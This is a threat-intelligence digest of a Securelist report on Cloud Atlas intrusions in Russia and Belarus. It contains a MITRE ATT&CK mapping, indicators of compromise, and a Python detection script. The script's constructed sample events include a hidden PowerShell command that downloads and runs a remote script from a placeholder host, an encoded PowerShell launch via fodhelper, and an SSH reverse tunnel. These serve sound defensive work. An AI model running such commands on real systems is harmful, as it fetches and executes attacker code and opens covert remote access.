Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

Cloud Atlas conducted widespread SSH tunnel activity through 2025 into 2026 against government and commercial targets in Russia and Belarus, using phishing archives, malicious LNK files, PowerShell loaders, and multiple backup access tools. The campaign added VBCloud, PowerShower, RevSocks, Tor, and PowerCloud to support theft, reconnaissance, persistence, and covert remote access. #CloudAtlas #VBCloud #PowerShower #RevSocks #PowerCloud

Key points

  • Cloud Atlas activity remained active in 2025 and 2026, targeting organizations in Russia and Belarus.
  • Initial access commonly used phishing ZIP archives containing malicious LNK files that launched PowerShell scripts.
  • The group also used older malicious document infection chains leveraging CVE-2018-0802 in Microsoft Office Equation Editor.
  • Fixed.ps1 delivered additional payloads, including the VBCloud backdoor and the PowerShower backdoor.
  • PowerShower supported reconnaissance, lateral movement, Kerberoasting, and credential theft via SAM and SECURITY file collection.
  • Attackers deployed reverse SSH tunnels, RevSocks, and Tor Hidden Services to maintain backup control channels and evade disruption.
  • PowerCloud exfiltrated administrator-related data to Google Sheets in Base64 format, while a browser-checking script logged active browsers to determine user presence.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Initial access was gained by emailing ZIP archives with malicious LNK files attached (‘the attackers emailed a ZIP archive containing an LNK file as an attachment’).
  • [T1204.002] User Execution: Malicious File – The shortcut relied on the user opening the attachment and executing the malicious LNK (‘archives containing malicious shortcuts’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Malicious LNK files launched PowerShell scripts from external resources (‘covertly execute PowerShell scripts hosted on external resources’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript was used for tunnel setup and execution (‘run VBS scripts via PAExec or PsExec’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence was created by adding payloads to Run keys (‘Creates “Run” registry key “YandexBrowser_setup”’).
  • [T1112] Modify Registry – The malware modified registry settings to ensure startup and persistence (‘Creates “Run” registry key’).
  • [T1105] Ingress Tool Transfer – Scripts downloaded additional payloads and decoy archives from remote servers (‘Downloads and drops “$temprar.zip”’).
  • [T1027] Obfuscated Files or Information – Multiple components were encrypted, encoded, or packed to hinder analysis (‘encrypted body of the backdoor’, ‘encoded in base64’).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Attackers enabled and abused RDP for interactive access (‘allow multiple RDP sessions in Windows 10’).
  • [T1218.011] System Binary Proxy Execution: Rundll32 – Not explicitly mentioned.
  • [T1218.002] System Binary Proxy Execution: Control Panel – Privilege escalation and UAC bypass were performed through fodhelper.exe (‘uses a UAC bypass technique via fodhelper.exe’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The script killed WinRAR to conceal activity and removed artifacts (‘executes “taskkill.exe /F /Im winrar.exe”’, ‘searches and deletes’).
  • [T1070.004] File Deletion – The attack cleaned up infection artifacts to reduce forensic traces (‘Searches and deletes “rar.zip”, “*.pdf.zip” and “*.pdf.lnk”’).
  • [T1098] Account Manipulation – The script changed permissions on folders to block access to private keys (‘set new access permissions to the folder containing the private key’).
  • [T1090.001] Proxy: Internal Proxy – RevSocks and SSH tunnels were used as proxy channels for remote access (‘allow direct connection to workstations on the local network’).
  • [T1090.003] Proxy: Multi-hop Proxy – Reverse SSH tunnels and Tor Hidden Services created layered access paths (‘bypass standard firewall rules’, ‘accessible via RDP from the Tor network’).
  • [T1021.004] Remote Services: SSH – Reverse SSH tunnels were established from the compromised host to attacker-controlled infrastructure (‘the compromised machine initiates an SSH connection’).
  • [T1219] Remote Access Software – RevSocks provided remote connectivity and network access (‘installed RevSocks’).
  • [T1095] Non-Application Layer Protocol – Tunnel traffic and port forwarding were used to move access through non-standard channels (‘forwarding ports to the Tor network’).
  • [T1082] System Information Discovery – PowerShower collected information about processes, administrator groups, and domain controllers (‘Collect information about running processes, administrator groups, and domain controllers’).
  • [T1018] Remote System Discovery – PowerShower identified domain controllers and network structure (‘domain controllers’).
  • [T1003.001] OS Credential Dumping: LSASS Memory – Not explicitly mentioned.
  • [T1003.002] OS Credential Dumping: Security Account Manager – The credential grabber copied SAM and SECURITY files from Volume Shadow Copy (‘Copies the SAM … and SECURITY system files’).
  • [T1003.006] OS Credential Dumping: DCSync – Not mentioned.
  • [T1003.003] OS Credential Dumping: NTDS – Not mentioned.
  • [T1134] Access Token Manipulation – Not mentioned.
  • [T1113] Screen Capture – Not mentioned.
  • [T1016] System Network Configuration Discovery – The browser checker and tunnel setup imply host environment checking, but this technique is not directly stated.
  • [T1056.001] Input Capture: Keylogging – Not mentioned.
  • [T1047] Windows Management Instrumentation – Not mentioned.
  • [T1543.003] Create or Modify System Process: Windows Service – The RDP service was restarted after patching (‘the script restarts the RDP service’).
  • [T1484.001] Domain or Tenant Policy Modification – Not mentioned.
  • [T1046] Network Service Discovery – PowerShower and related tooling performed network reconnaissance (‘network reconnaissance’).
  • [T1106] Native API – Not mentioned.
  • [T1135] Network Share Discovery – Not mentioned.
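As an added example (not code from the Securelist report or from this digest), a small Python rule set that runs over constructed Sysmon-style process and registry events and flags the behaviours quoted above: PowerShell launched from Explorer that fetches a remote script (the LNK lure), the “YandexBrowser_setup” Run key, the taskkill on winrar.exe, a process spawned by fodhelper.exe, and an outbound reverse SSH tunnel. The sample events, host name, address and paths are constructed, and the tunnel rule assumes the OpenSSH client's -R remote-forwarding syntax, which the report does not spell out.

```python
import re

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()  # file name from a Windows path

# Constructed Sysmon-style events (not from the report); example.invalid / 203.0.113.10 are placeholders.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1'))"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "YandexBrowser_setup", "data": r"wscript.exe C:\ProgramData\update.vbs"},
    {"type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "taskkill.exe /F /Im winrar.exe"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\fodhelper.exe", "cmd": "cmd.exe /c powershell.exe -enc AAAA"},
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": "ssh.exe -N -R 3389:127.0.0.1:3389 -i C:\\ProgramData\\key user@203.0.113.10"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "notepad.exe report.txt"},
]

# Each rule: (description, predicate over one event). Descriptions follow the behaviours quoted above.
RULES = [
    ("PowerShell spawned by Explorer fetching a remote script (LNK lure)",
     lambda e: e["type"] == "process" and _basename(e["image"]) == "powershell.exe"
     and _basename(e["parent"]) == "explorer.exe"
     and re.search(r"https?://|DownloadString|-enc", e["cmd"], re.I) is not None),
    ("Run key value 'YandexBrowser_setup' written",
     lambda e: e["type"] == "registry" and e["key"].lower().endswith(r"\currentversion\run")
     and e["value"].lower() == "yandexbrowser_setup"),
    ("WinRAR force-killed (decoy cleanup)",
     lambda e: e["type"] == "process" and re.search(r"taskkill.*winrar\.exe", e["cmd"], re.I) is not None),
    ("Process spawned by fodhelper.exe (UAC bypass)",
     lambda e: e["type"] == "process" and _basename(e["parent"]) == "fodhelper.exe"),
    ("OpenSSH client started with -R (reverse tunnel; assumed syntax)",
     lambda e: e["type"] == "process" and _basename(e["image"]) == "ssh.exe"
     and re.search(r"(^|\s)-R\s", e["cmd"]) is not None),
]

def detect(events):
    """Return (description, event_index) pairs for every event that trips a rule."""
    return [(desc, i) for i, e in enumerate(events) for desc, pred in RULES if pred(e)]

if __name__ == "__main__":
    for desc, i in detect(EVENTS):
        print(f"{desc}: event {i}")
```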

Indicators of Compromise

  • [File hashes] malicious components and loaders – 1A11B26DD0261EF27A112CE8B361C247, 5329F7BFF9D0D5DB28821B86C26D628F, and other hashes such as 2B4BA4FACF8C299749771A3A4369782E
  • [File names] VBS, PowerShell, and payload files used in execution chains – WriteToSchedulerKillSSH.vbs, WriteToSchedulerGenerateKey.vbs, and other names such as rdp_new.ps1 and googleearth.ps1
  • [File paths] dropped or abused binaries and scripts on victim hosts – C:\Windows\PLA\System\Run.vbs, C:\ProgramData\hpclient.exe, and other paths such as C:\Users\[username]\Pictures\googleearth.ps1
  • [Domains] reverse SSH/SOCKS and staging infrastructure – tenkoff[.]org, cloudguide[.]in, and other domains such as onedrivesupport[.]net and znews[.]net
  • [IP addresses] PowerShell payload staging servers – 194.102.104[.]207, 46.17.45[.]56, and other IPs including 185.22.154[.]73 and 193.125.114[.]57
  • [Hash / sample identifiers] malicious Office documents and auxiliary samples – the report lists a long MS Office document hash set and samples for ReverseSocks and browser-checking payloads, including 5329F7BFF9D0D5DB28821B86C26D628F

Read more: https://securelist.com/cloud-atlas-2026/119895/